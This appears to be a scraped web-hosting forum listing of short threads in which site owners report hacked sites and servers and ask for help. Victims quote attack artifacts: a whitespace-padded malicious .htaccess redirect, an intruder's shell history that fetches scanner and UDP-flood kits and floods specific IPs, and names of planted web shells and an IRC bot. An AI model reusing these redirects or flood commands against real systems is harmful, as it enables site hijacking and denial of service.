Website Has Been Hacked
			Apr 30, 2009
				Just this week, I believe one of my site has been hacked...or potentially my whole server! When accessing the website (a vBulletin forum), instead of going to the main page, we get a screen that looks like Window's "My Computer" and there is a scan running. Firefox has blocked the site for suspicion.
I am stumped. Where to begin? I have full SSH access to my server (after rebooting it). Thank you in advance.
Server: CentOS Linux 4.3
	
	View 10 Replies
  
    
	ADVERTISEMENT
    	
    	
        Jul 27, 2007
        So I'm interviewing with a company and when I typed in the URL to their website, I was met with a nasty surprise: a "hacked by so and so" message!  However, after looking closer, I see that I had accidentally appended a period (".") to the end of the domain name, for example: http://www.example.com./
When I removed the period, the site appeared as normal.  I don't know anything about the server other than it's IIS.  Is there anything I can suggest to them when I go in to interview?  I'd like to point this out to them; it may even help my chances at landing the job!  (It's not related to networking, though.)
	View 0 Replies
    View Related
  
    
	
    	
    	
        Aug 14, 2008
        my site is hacked regularly 
today when i checked htaccess file i found 
Code:
                                                                                                                                                     # a0b4df006e02184c60dbf503e71c87ad                                                                                                                                         
                                                                                                                                                   RewriteEngine On                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER}  [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=                                                                                                                                                      
                                                                                                                                                      RewriteCond %{HTTP_REFERER} =[^&]+(%3A|%22)                                                                                                                                                      
                                                                                                                                                      RewriteCond %{TIME_SEC} <59                                                                                                                                                      
                                                                                                                                                      RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]                                                                                                                                                      
                                                                                                                                                      # a995d2cc661fa72452472e9554b5520c
in it what does this code does.
	View 24 Replies
    View Related
  
    
	
    	
    	
        Apr 24, 2007
        I have been getting a lot of abusive email lately, just deleted them and thought nothing off it. Just about to go to bed and I see my website has been hacked.
www.pic-spot.com
They also said they were after www.anotherlaugh.com and www.shinyproxy.com
	View 5 Replies
    View Related
  
    
	
    	
    	
        Jun 27, 2009
        few sites are continously been hacked, these sites i m working on, whenever i connect the sites through FTP client(i m using Flash FXP) and upload the files the very next day the index file have the Iframe code written after the body tag by someone else of some malware site.
i have tried everything, changing the password on daily basis,even reinstall my system completey(thinking if there any backdoor trojan) firewall and antivirus, 
	View 13 Replies
    View Related
  
    
	
    	
    	
        Jul 18, 2009
        We have a simple flash site. Not CMS or anything of that sort.
Recently out site was hacked. Nothing malicious as the only code that seems to have changed was out index file in which they injected a malware script ....
	View 13 Replies
    View Related
  
    
	
    	
    	
        Aug 7, 2007
        One of my clients has joomla site installed on his hosting. 
But recently his website always get hacked. Hacker put one index.html file in the public_html folder. luckily they not deleting file and database.. 
This is happen twice in one week, even he change the cpanel password to a more complex one...
anyway to prevent this? any way to harden the security?
	View 16 Replies
    View Related
  
    
	
    	
    	
        May 11, 2007
        This is the second time this week that my website was hacked.  On the first hack attempt they somehow got into my cpanel and corrupted my license file which I had my host fix.  Other than that the only damage done was an html file that replaced my main page.  Then today, I find that my website has been further compromised, but by a completely different group.  The first hacker was g3n3t1x and this second hack was done by www.turkishdefacerteam.com
Now, the problem is my sites dedicated IP is 72.36.192.150, and my domain name is gamingguilds.net, but if you resolve the domain name, it resolves to 74.53.52.66.  I have checked my nameservers and everything is set properly.  But the thing I don't get is that when you type in my domain name in a web browser, you see my website.  How can it be resolving to the wrong IP and STILL show my website.  Also note that when you type in my dedicated IP it would still show my website (before this second attack).
Now after the second attack, my dedicated IP no longer works, I cant get into cpanel using the IP, I cant get into my FTP account, and I get view my website.  Yet if you use the domain name to log into cpanel or view the website it works.  The strange part here is that I can't get into the FTP using the domain name.
SO, if you go to [url]you see a blank cpanel site, if you go to [url] you get a 404 error, and if you go to www.gamingguilds.net you get my website.
	View 14 Replies
    View Related
  
    
	
    	
    	
        Jun 14, 2009
        I have a small but somewhat popular space-history website.  Very simple HTML that I typed into wordpad, but it has long pages full of photos.  Since 2003, I've been using media3.net with their business-class Windows service.
A few weeks ago, mypages were hacked, and a one line script inserted that called an Adobe Flash file.  Apparently this was a server-wise attack, not just my web pages.  Media3.net cleaned this up, but now it has happened again.
This is bad, because Google blacklists my site, and folks on Wikipedia get upset because there are a lot of links to my site.
How are they breaking in to media3.net?  I think I must change hosts, but I don't want to put my image-intensive site on overbooked hardware with limited bandwidth.
	View 14 Replies
    View Related
  
    
	
    	
    	
        Feb 19, 2007
         my server was hacked by Cold he/she inserted a couple of scripts that enabled remote access into a 777 permission folder.
i found the following script names:
back.pl
cpanel.php
cgitelnet.pl
cpanel.pl
gcc-cold <- shell script
i have deleted all the above files, and changed the folder chmod to 755
but the weird thing is, through shell, when i try to locate the file gcc-cold i get this:
Quote:
root@ [/tmp]# locate gcc-cold
/home/ns5f6/public_html/uploads/gcc-cold
root@ [/tmp]# rm /home/ns5f6/public_html/uploads/gcc-cold
rm: cannot lstat `/home/ns5f6/public_html/uploads/gcc-cold': No such file or directory
isn't locate NOT supposed to find that file after its been deleted? and if it was not deleted some how, isn't it supposed to delete it? am i missing something here??????
from a bit of researching the files, i found that it was a telnet script, BUT i have telnet disabled, and there's no process running along side GREP TELNET
how can i find malicious software or shell scripts that allow such hacking activities on the server?
	View 6 Replies
    View Related
  
    
	
    	
    	
        May 3, 2008
        If I type google.com in my address bar, it forwards me to www.google.com. This is not happening for my website right now. I think its a good idea to do this, since then search engines will have only 1 main URL for the website to index. 
My question is: 
How do I implement this? I think this may involve mucking with CNAME settings...
	View 2 Replies
    View Related
  
    
	
    	
    	
        May 15, 2009
        I want my users to be redirected directly to my forum
 
so when they type in www.mywebsite.com it will redirect instantly to www.mywebsite.com/forums
 
I know this can be done on Cpanel... any other ways?
	View 7 Replies
    View Related
  
    
	
    	
    	
        Apr 3, 2008
        I am renting a 384mb Plesk VPS, have 1 client website on it, and it was hacked. Someone set up a new user with root access and was attacking other networks including dictionary attacks. My host has cleaned up the mess. I suspect access was gained thru a weak password choice or thru a Wordpress hack.
The client website ran a php/mysql survey script sometimes with 20-25 simultaneous users, and about 5-10% were unable to complete the survey due to screen freeze up or time outs. I'm trying to get to the bottom of these errors and know that some of the problems were client side but could the attacks also have affected connectivity & website performance?
	View 2 Replies
    View Related
  
    
	
    	
    	
        Aug 5, 2009
        2 days ago i noticed my cpanel hardisk usage was a lot more then it should be, after looking around i found out my inbox was 400mb (82143)emails!! i don't use any of the cpanel email because i have them set to forwarding. all the emails are spam and i discovered a few  emails using my domain (that i did not create) that are valid and when i email them it reaches this cpanel inbox
So how bad is it? have i been completely comprised or is someone managed to get some type of spaming access only?
	View 5 Replies
    View Related
  
    
	
    	
    	
        Feb 5, 2008
        I have a server with about 100 domains on it in Plesk.  I have about 10 or so clients that pay me a pittance to host their site and the rest are various domains that have been parked.
About a week ago we received a "too many connections" error when accessing Plesk.  This is our server and it sits at The Planet (formerly EV1).  I cranked up the mx connections to 1,100 or so following some web tutorial but I'm really a complete idiot when it comes to this server stuff.  (I'm more of a php / html kind of guy).  
I check out logs and it appears that someone has been trying to access a bunch of celebrity images that shouldn't exist on our server.  It's clearly spam of some kind.  I can't seem to actually find these images on my server anywhere, but I've got a feeling that foul play has been involved.
	View 7 Replies
    View Related
  
    
	
    	
    	
        Feb 4, 2007
        Well, this is rather weird. I cant tell if this is a server error, or a hack.
Basically the contents of the thumbnail directories for videos, games and pictures were deleted, at 3pm today (according to the ftp time stamp). All those folders were chmodded 777, to allow PHP to upload the images into them. 
	View 14 Replies
    View Related
  
    
	
    	
    	
        Jul 23, 2007
        My cpanel server has an intruder who brought all the sites down. I did my best to harden the server a year or so ago, but...
I got an email from one of my scripts:
SUBJECT: [hackcheck] kill has a uid 0 account
IMPORTANT: Do not ignore this email.
This message is to inform you that the account kill has user id 0 (root privs).
This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.
To say the least, the server was compromised. I cannot find the user "0" or "kill" in WHM, but under "Wheel Group Users" "kill" is listed under "Add a user to the wheel group."
Any help or insight would be appreciated! Anyone proficient at hardening servers and exorcising hackers?
I uploaded the latest chkrootkit and ran it.  The results say it's clean.
	View 14 Replies
    View Related
  
    
	
    	
    	
        Feb 13, 2007
        Am I hacked by somebody?
Any thing I can do to stop this (for example by hiring server management company)???
Here's the info that RKHunter provided:
/sbin/modinfo                                              [ NA ]
/sbin/insmod                                               [ NA ]
/sbin/depmod                                               [ NA 
Rootkit 'RH-Sharpe's rootkit'...                           [ Warning! ]
             --------------------------------------------------------------------------------
             Found parts of this rootkit/trojan by checking the default files and directories
             Please inspect the available files, by running this check with the parameter
             --createlogfile and check the log file (current file: /dev/null).
             --------------------------------------------------------------------------------
Checking users with UID '0' (root)...                      [ Warning! (some users in root group) ]
    info: adm:0
And here's the info I've found after investigation:
-bash-2.05b# pwd
/usr/local/games
-bash-2.05b# ls -lah
total 332K
drwxr-xr-x   3 root root 4.0K Feb  5 15:59 .
drwxr-xr-x  15 root root 4.0K Feb 12 19:32 ..
drwxr-xr-x   3 1555 1555 4.0K Feb  2 12:58 .fl
-rwxr-xr-x   1 root root 263K Feb  2 12:51 ettercap
-rwxr-xr-x   1 root root  17K Feb  2 12:51 parse
-rw-r--r--   1 root root  119 Feb  2 12:51 pid
-rw-r--r--   1 root root  27K Feb  3 17:44 x
-bash-2.05b#
	View 5 Replies
    View Related
  
    
	
    	
    	
        May 22, 2007
        i daily check my error log files to see if something was wrong , checkout what i found
the first one is probably trying to hack my site to get to my ads and changing it to them i think
 [error] [client 195.23.16.24] File does not exist: /var/www/html/a1b2c3d4e5f6g7h8i9
 [error] [client 195.23.16.24] script '/var/www/html/adxmlrpc.php' not found or unable to stat
 [error] [client 195.23.16.24] File does not exist: /var/www/html/adserver
 [error] [client 195.23.16.24] File does not exist: /var/www/html/phpAdsNew
 [error] [client 195.23.16.24] File does not exist: /var/www/html/phpadsnew
 [error] [client 195.23.16.24] File does not exist: /var/www/html/phpads
 [error] [client 195.23.16.24] File does not exist: /var/www/html/Ads
 [error] [client 195.23.16.24] File does not exist: /var/www/html/ads
this 1 I dont know  
 [error] [client 71.190.229.120] File does not exist: /var/www/html/_vti_bin
 [error] [client 71.190.229.120] File does not exist: /var/www/html/MSOffice
 [error] [client 69.181.195.171] File does not exist: /var/www/html/_vti_bin
 [error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
 [error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
This 1 is kinda keep me scared i dont know what it is either
[Mon May 21 16:11:00 2007] [error] [client 129.29.227.4] Invalid URI in request T 5.1; U; en)
[Tue May 22 15:59:09 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179781859
[Tue May 22 16:09:15 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:20 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:24 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:29 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:29:29 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179868171
[Tue May 22 16:30:23 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179869368
[Tue May 22 16:30:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:30:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
	View 3 Replies
    View Related
  
    
	
    	
    	
        Sep 10, 2007
        my server hacked
24 cat /proc/cpuinfo
25 ls
26 cd /var/tmp
27 ps x
28 ls
29 mkdir .www
30 cat /proc/cpuinfo
31 cat /etc/issue
32 mkdir .ww
33 cd .ww
   36  download alexscan.tar.gz
   37  tar xvfz alexscan.tar.gz
   38  tar xvf alexscan.tar.gz
   39  cd Vek
   40  ls
   41  ./Vek 210
   42  ls
   43  cd ..
   44  ./ss
   45  ls
   46  cd ..
   47  cd .ww
   48  download joker.tgz
   49  tar xvfz joker.tgz
   50  download flood-udp.tar
   52  tar xvfz flood-udp.tar
   53  tar xvf flood-udp.tar
   54  perl udp.pl 72.8.131.39 0 0
   55  perl udp.pl 89.42.72.6 0 0
   56  perl udp.pl 83.42.64.149 0 0
   57  passwd
   58  ls
   59  cd joker
   60  ls
   61  chmod +x *
   62  ./x 23.12
	View 14 Replies
    View Related
  
    
	
    	
    	
        May 9, 2007
        I have a new server and I have hardened it with csf+lfd. It's about 65/70 in the cfs score.
This morning, I noted that lfd log sent me an email saying there is a SSH login via 207.210.233.128 on 10th May 2007. I am not sure whether it was a successful login or not?
Here is the output:
=================
Time:    Thu May 10 01:31:52 2007IP:      207.210.233.128 (Unknown)Account: rootMethod:  password authentication
========================
I know for sure that I did not login my SSH yesterday.
However, when I logged in SSH this morning, it says in telnet that my last login was from my own home computer's IP, so from that it looks like no one else has logged in SSH since last time I logged in myself.
Was my server intruded or was lfd just playing up?
	View 2 Replies
    View Related
  
    
	
    	
    	
        May 11, 2007
        Go to this page: 
[url]
how I can find out what page they have changed? It is a php file with loads of includes etc. Not sure where to look! Or could it be a redirect or something?
	View 2 Replies
    View Related
  
    
	
    	
    	
        Apr 12, 2007
        I have a VPS running cpanel/whm on CentOS. 
Everyday someone keeps coming in and deleting all my accounts. I do have them saved, but I cannot figure out how they are doing it.
I have followed the tips on the forum for locking down VPS. We have restriced SSH logins to our IP, we have checked all directories for ones that are 777 and changed them, we have moved the server to a different IP address. 
	View 14 Replies
    View Related
  
    
	
    	
    	
        Nov 23, 2008
        Now, first of all... I'm not sure if this is a problem with WHMCS or some other piece of software with a security hole, but I thought I should post here.
Our WHMCS got hacked earlier today and the hacker sent out a to be honest, unacceptable email to all clients, I won't go into detail but lets just say it directly insulted them.
Now apart from ruining our reputation and client relationships, I am now completely paranoid that it will happen again. I'd also like to know how it happened in the first place. The hacker signed up for a hosting account, and then sent the email. I have no idea how he/she did it, but when I look at the admin log in WHMCS, it shows the username "hacked" as logging in (see image).http://img378.imageshack.us/img378/2560/hackedmh9.png
Just a warning to everyone out there. His IP address was 86.132.228.82.
	View 11 Replies
    View Related
  
    
	
    	
    	
        Jul 27, 2008
        A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?
	View 6 Replies
    View Related
  
    
	
    	
    	
        Jan 27, 2009
        we have a vps server and someone did what I would call a calling card attack, thankfully.
It is a stock kubuntu os with stock apache. Root passwords for everything have been changed to our own
Somehow they logged into kubuntu as root and changed the htpasswd in usr/passwords (changed to protect the password).
Then since they changed the htpasswd they were able to log into phpmyadmin and changed the admin password in the database.
I'm pretty sure I know who did it and he is teaching us a lesson which I respect but he will not comunicate with us.
We have hourly snapshots of our vps and we need to know how they are getting in. See my sig and click on the hotspot login.
Looking at the sudoers there is the Defaults line that we suspect as a means to get in.
We have a great php etc... app but it is either Apache or kubuntu that they can get in.
I would like to learn about what needs to be done about security but where do I start?
Can someone help me look for something that would allow the attack?
I'm a php guy and it is not a mysql injection attack nor is it an xss attack.
I am not a kubuntu / server security guy and now need your advice.
	View 7 Replies
    View Related
  
    
	
    	
    	
        May 22, 2008
        Out of the three websites that were hacked the hacker left a get.php file in the root and i decided to see what it was and i ran it. To my shock and horror it gave me all the different types of people hosted on the server and it also gave me their database passwords etc...
Now each time i ran it, it gave me different results of different users on the server each time with a long never ending list. I just couldnt believe my eyes a simple short written php script showed me a lot.
Now im not a PHP guru but this is quite serious and ive notified my web host showing them my findings. I was quite astonished it showed me passwords in peoples configs.
Now my question is... is this something new or old and that my web hosts forgot to look into that area...? I mean its a php script thats all.
	View 8 Replies
    View Related
  
    
	
    	
    	
        Oct 1, 2007
        One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.
Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.
I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.
	View 10 Replies
    View Related
  
    
	
    	
    	
        Mar 17, 2007
        SOme one has claimed that he has penetrated my server and has gathered some kind of information via shell access, I have disabled the possible ways of shell access for the users via twaek settings, and php.ini
- How I can check he has made any backdoor for himself or not?
and I have made a trojan check via Scan for Trojan Horses   in WHM, and it has found about 200 possible trojans.
- How I can remove them?
	View 14 Replies
    View Related
  
    
	
    	
    	
        May 18, 2009
        217.67.250.41 - - [18/May/2009:15:36:08 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"
What is mean ? Sorry for ask a fast answer. I have change my domain's IP to protect someone can run dangerous script...
	View 6 Replies
    View Related
  
    
	
    	
    	
        Dec 21, 2006
        My dedicated server was rather slow. Upon checking, I had a new cron job, (deleted now) made by apache, pinting to the following IRC bot.
[root@server50040 tmp]# cd .LiveZone/
[root@server50040 .LiveZone]# ls -al
total 384
drwxr-xr-x 10 apache apache   4096 Dec 21 12:17 .
drwxrwxrwt  3 root   root     4096 Dec 21 12:15 ..
-rwxr-xr-x  1 apache apache    320 Dec  9  2004 config
-rw-------  1 apache apache   1002 Dec  9  2004 config.h
-rw-rw-r--  1 apache apache     55 Dec 20 22:55 cron.d
-rwxr-xr-x  1 apache apache    347 Dec  9  2004 ****
drwxr-xr-x  2 apache apache  12288 May 31  2002 help
-rwxr-xr-x  1 apache apache 210216 Dec  9  2004 httpd
drwxr-xr-x  2 apache apache   4096 Jan 12  2002 lang
-rw-------  1 apache apache    492 Dec 21 12:17 livezone
-rw-rw-r--  1 apache apache     19 Dec 20 22:55 livezone.dir
-rw-------  1 apache apache    492 Dec 21 12:09 livezone.old
drwxr-xr-x  2 apache apache   4096 Dec 21 12:10 log
-rw-r--r--  1 apache apache   2137 Sep 26  2003 Makefile
-rw-r--r--  1 apache apache    731 Dec  9  2004 makefile.out
-rwxr-xr-x  1 apache apache  15090 Dec  9  2004 makesalt
drwxr-xr-x  3 apache apache   4096 Jul 30  2000 menuconf
drwxr-xr-x  2 apache apache   4096 Jul 17  2000 motd
-rwxr-xr-x  1 apache apache  14306 Nov 13  2003 proc
-rw-------  1 apache apache      6 Dec 21 12:10 psybnc.pid
-rw-r--r--  1 apache apache  10780 Dec  9  2004 README
-rwxr-xr-x  1 apache apache     68 Jun  4  2004 run
drwxr-xr-x  2 apache apache   4096 Dec  9  2004 scripts
drwxr-xr-x  2 apache apache   4096 Dec  9  2004 src
-rw-------  1 apache apache   3901 Jan 12  2002 targets.mak
drwxr-xr-x  2 apache apache   4096 Dec  9  2004 tools
-rwxr--r--  1 apache apache  21516 Sep 25  2002 xh
-rwxrw-r--  1 apache apache    194 Dec 20 22:55 y2kupdate
	View 10 Replies
    View Related